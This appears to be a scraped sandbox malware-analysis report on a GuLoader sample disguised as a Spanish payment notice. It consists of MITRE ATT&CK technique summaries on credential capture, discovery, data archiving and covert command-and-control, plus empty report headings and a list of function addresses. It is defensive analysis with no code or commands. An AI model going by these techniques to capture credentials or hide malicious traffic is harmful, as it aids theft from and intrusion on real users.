Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Confirming - Aviso de pago.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: Confirming - Aviso de pago.exe PID: 5756 Parent PID: 5960

General

Chronological Activities

Analysis Process: conhost.exe PID: 6104 Parent PID: 5756

General

Chronological Activities

Function 0041CDE4, Relevance: 344.8, APIs: 180, Strings: 16, Instructions: 1804
COMMON

Function 0041F0ED, Relevance: 68.6, APIs: 35, Strings: 4, Instructions: 358
COMMON

Function 00420F2D, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Function 0041ECBC, Relevance: 13.6, APIs: 9, Instructions: 76
COMMON

Function 00421083, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Function 004015A8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
COMMON

Function 00403B94, Relevance: .0, Instructions: 8
COMMON

Function 00403A9C, Relevance: .0, Instructions: 8
COMMON

Function 0041F81D, Relevance: 91.4, APIs: 50, Strings: 2, Instructions: 369
COMMON

Function 004200DA, Relevance: 87.8, APIs: 41, Strings: 9, Instructions: 340
COMMON

Function 004206D7, Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 206
COMMON

Function 0041EDD2, Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 177
COMMON

Function 0041FDEA, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 174
COMMON

Function 004209D8, Relevance: 36.8, APIs: 19, Strings: 2, Instructions: 98
COMMON

Function 00420B7D, Relevance: 27.2, APIs: 18, Instructions: 219
COMMON

Function 0041F5DC, Relevance: 15.2, APIs: 10, Instructions: 183
COMMON

Function 004212FB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
COMMON